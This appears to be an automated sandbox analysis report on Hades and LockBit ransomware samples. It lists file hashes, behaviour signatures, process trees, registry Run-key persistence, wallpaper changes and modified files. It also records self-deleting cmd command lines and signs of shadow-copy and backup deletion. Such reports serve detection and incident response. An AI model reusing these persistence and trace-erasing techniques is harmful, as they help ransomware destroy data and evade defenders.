| SHA256 | ae40e84593ac3e961c0db15d5aee23ee54210d646a7786651f052371ffc38c87 |
| SHA512 | 0f6ab7f9e7a0efec1c798072d979a98492ed8cd9f0d71637ecd42f138bb1de218f5d5f6c6fc94c2ca641375738f2a191c6c6486ab57d375d0a861472757a2d80 |
C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.TH.XML
| MD5 | 535616fac638a62e4a36c2bf2fcefd47 |
| SHA1 | cedbf3d4ef317151fcd9eb89ff106ca3699396d9 |
| SHA256 | dd40897f3c1ea3dc6e06f9507f151ef59879b730e8cad0cd58438fbeaad6d00e |
| SHA512 | 7e3019a87460f15b557a6c1cb0c11ea158d247ff21480d7a7db993d821e0a7ca2cbb425cbba0fe3d719be98b9c9a6e72dd273c5f4e8f53031e92d9ae0f462f4a |
C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.AU.XML
| MD5 | d2f28dba18db15da8638c93a43c92078 |
| SHA1 | fdad7a7af03bb3419a24b09eb2826c3e75ada2fc |
| SHA256 | 673884634ba6c369d193c811e2ceb7f1a4d67a42d75fa3849de4438de990d5b9 |
| SHA512 | 35c8e1b80401ace5611ce89a989ee25eca38901d7901c2a2b5a337abbca7ebf528fff9fcb6d2dab97820830e911961c15055ddc4b5b6482a55a445fccc46941a |
C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.XML
| MD5 | c889899deeed19310e5ac540f1596697 |
| SHA1 | 198156431932d2bf8b79ed0c808f30d02ae4b3c2 |
| SHA256 | 0dc572c2e972cd84a0c905026431c80004a0cced51a45ee1d2b48e25cbd627ab |
| SHA512 | e901a26e68f675d19b7a607bd6b14b279cab391ad0c752b5c69581ad9b0f5817d3529b438dbeb5773a8b5ab0278bde90a4e7c37cf27e8accfe9c8de662e14ff6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\DesktopSharingHub\readme.txt
| MD5 | dbac9649c4bd702f55fbd1afafe87c44 |
| SHA1 | 0d914f4a809cfe400ca111ebfbd0ad552d500785 |
| SHA256 | b9dfa3b30224bd5eef298531c945d5f2f6bb978b7ef42e5ef09715a535172127 |
| SHA512 | 86d7786b400303b1fb722689aba7e8ef6a01ad7e2776194c5d545a7d7357dd91e7079296790587210683db7f4385f98f281272fd3d1ad6770dabf401709a6415 |
C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\UGUBWRQR\desktop.ini
| MD5 | cb856e8bdfb00c240d43441aa7c62e9f |
| SHA1 | d0c9def032806d32bc485ea5493e34217d5091c9 |
| SHA256 | f495547fca5a5a2c40dccebefe40160efb8bc2888e8afef712b096b5f2585b44 |
| SHA512 | 770a9aa6e15da08da30c88a594ecdb1354cb5342b3b9da31abe6f312e3e31575b9e7748ac7227d6a1414c6bd7b66552d857bb1df302c848648557317852081ef |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290\msapplication.xml
| MD5 | 76fd968461edb535e6acfdf926cd1669 |
| SHA1 | 77a81320a9c1b6a1a170118b1cf4ab80add44908 |
| SHA256 | d70aa8e79cfca04ee991d33a37352d66df118c720a3b80c58b8c3a54f2608aee |
| SHA512 | fdf213bd15fbfce5365f73901781734942a711be8f3f590bff1091601dbc6c715c905f108b8c3f568e0d6c83028fbea077044a7cec054b675b63823847de8b91 |
C:\ProgramData\Microsoft\Windows\Caches\{41462E22-6FAD-4079-8CD7-8D2731E4A375}.2.ver0x0000000000000002.db
| MD5 | d846dfbc02378d2abc6f1bfe15fcbb41 |
| SHA1 | 7c2258eeef30b2332f8078443aaad2dd03330450 |
| SHA256 | 3982088d0f4ad78ba7e0c2d55a171c42a95541e18fa8caddba0a43931aace384 |
| SHA512 | ba96848d686625b8045312390a164bca810383f5018221fd05892e5905f624d4ce2b0f98283fc7ca74c0b2f6ab65071efce31e96a54a552fc14dd9ec69284a9e |
C:\ProgramData\Microsoft\Windows\Caches\{2388BCF4-53D9-4E4F-92D4-56774A7C0F36}.2.ver0x0000000000000001.db
| MD5 | c20fc0a5bf22801a1e22a7433c66de17 |
| SHA1 | 2f70426afa08748f631a0d1013cb5b3f88879e09 |
| SHA256 | 116388fbca2c75260a350e2a7e23b972601a2efaa7db7d65d9859a9387ab5250 |
| SHA512 | bb3e4fe86f2c904b5834d5b265056dc4fe5c6c43ecbcb5c09cf74ee64b31558b3545c97996f4f69cc478f7aee5cdb53e730b6af3929bf1e0e964d925ce74051d |
C:\ProgramData\Microsoft\Windows\Caches\{1D2729A6-BF93-41C5-9972-10C6A9D3FDA8}.2.ver0x0000000000000001.db
| MD5 | 3c6fcf1c23b09bf91e99d9080c6021b6 |
| SHA1 | c74b22dcdc9cd100c10742c439d0bb7c8588f056 |
| SHA256 | 6f35a61fe7eb497dee36491fdb3f0e307a03e45efb762c9db852e466b9f55efa |
| SHA512 | b54d40df82381c7e12e20391deabf1088716c38ec46b590c4c4fc77f79f6bbd49ec485c7981b38765a74d5ea25f6a49e6f1e9df5398ef3c72a458636a97463ff |
C:\Users\desktop.ini
| MD5 | ace3165e852adb8aedbeda2aa3be570b |
| SHA1 | 4577ff7e92850e2723008f6c269129bd06d017ea |
| SHA256 | 237f73d46d3501de63eae1f85fdf37e65ddced70f013b7f178d1ee52b08f051f |
| SHA512 | cf77563b9295b191ce2f309e03618d1ab4d317f65b87dbecc4904ee2d058db06d23c20c199571b0fafb67ae5ec5166b76af0b7d8bfe3996b0dde9751e28f8c03 |
Analysis: behavioral25
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:40
Platform
win7-20240704-en
Max time kernel
1443s
Max time network
1454s
Command Line
Signatures
Hades Ransomware
Hades payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
CryptOne packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Renames multiple (246) files with added filename extension
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"
C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan
C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan /go
C:\Windows\system32\cmd.exe
cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan" & del "C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan" & rd "C:\Users\Admin\AppData\Roaming\Play8Pla\"
C:\Windows\system32\cmd.exe
cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe" & del "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe" & rd "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\"
C:\Windows\system32\waitfor.exe
waitfor /t 10 pause /d y
C:\Windows\system32\waitfor.exe
waitfor /t 10 pause /d y
C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"
C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan"
Network
Files
memory/1360-0-0x0000000001B60000-0x0000000001D22000-memory.dmp
memory/1360-1-0x0000000140000000-0x00000001401E2000-memory.dmp
\Users\Admin\AppData\Roaming\Play8Pla\Wwan
| MD5 | 9fa1ba3e7d6e32f240c790753cdaaf8e |
| SHA1 | 7bcea3fbfcb4c170c57c9050499e1fae40f5d731 |
| SHA256 | fe997a590a68d98f95ac0b6c994ba69c3b2ece9841277b7fecd9dfaa6f589a87 |
| SHA512 | 8d2fb58cb8776ead15f445671431eae13a00b48921e545c7ecbf91829015d818d663d9369f181de669ebb771b113c2f675c3a156fac5ede019b5fad9cb8c65fe |
memory/2700-11-0x0000000001B70000-0x0000000001D32000-memory.dmp
memory/2700-12-0x0000000140000000-0x00000001401E2000-memory.dmp
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\HOW-TO-DECRYPT-gn9cj.txt
| MD5 | 0c6d0a67b942d06fe27f41c7c582cdfe |
| SHA1 | 7e674cf6375b138cabca2706583d4ced7a1aef27 |
| SHA256 | 014ea5effc97085b7832512b9ad2a5c4487265eb67e8d7b0920ef2bc8768400c |
| SHA512 | 53ec4509bc58f53419a8923d808c7dfdecf57dc203c37265d061aebab73147720d1c419e79578065a42c3b2a63504370f90516c3f0afad5d6997952592d3a39c |
memory/1360-511-0x0000000140000000-0x00000001401E2000-memory.dmp
memory/2700-514-0x0000000140000000-0x00000001401E2000-memory.dmp
memory/2700-515-0x0000000001B70000-0x0000000001D32000-memory.dmp
memory/1360-517-0x0000000001B60000-0x0000000001D22000-memory.dmp
memory/1360-516-0x0000000140000000-0x00000001401E2000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 16:12
Platform
win7-20240705-en
Max time kernel
1561s
Max time network
1570s
Command Line
Signatures
Lockbit
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Renames multiple (9368) files with added filename extension
Deletes backup catalog
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RansomwareSamples\\LockBit_14_02_2021_146KB.exe\"" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\Users\\Admin\\Desktop\\LockBit-note.hta" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6CA8.tmp.bmp" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_divider_right.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\de-DE\OmdProject.dll.mui | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\sports_disc_mask.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bahia_Banderas | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02048_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Civic.thmx | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN102.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BROCHURE.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-dialogs.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\settings.html | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00449_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107258.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\css\weather.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099204.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199429.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18196_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Modern.dotx | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\NextMenuButtonIcon.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector_1.0.200.v20131115-1210.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGSIDEBR.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\js\init.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Basic\DEFAULT.XSL | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\css\localizedSettings.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105338.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\BUTTON.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nassau | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Palau | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\it-IT\css\cpu.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\utilityfunctions.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\WSS\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata_2.2.0.v20131211-1531.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287417.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14983_.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Argentina\Buenos_Aires | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15022_.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\HEADER.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\tab_on.gif | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-execution.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\gadget.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0149407.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR48B.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\weather.html | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\gadget.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099155.JPG | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_zh_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\SystemV\YST9YDT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Oasis\TAB_OFF.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_rest.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\clock.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SL00345_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02794_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR31F.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\logo.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_zh_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Enumerates physical storage devices
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Control Panel\Desktop\WallpaperStyle = "2" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
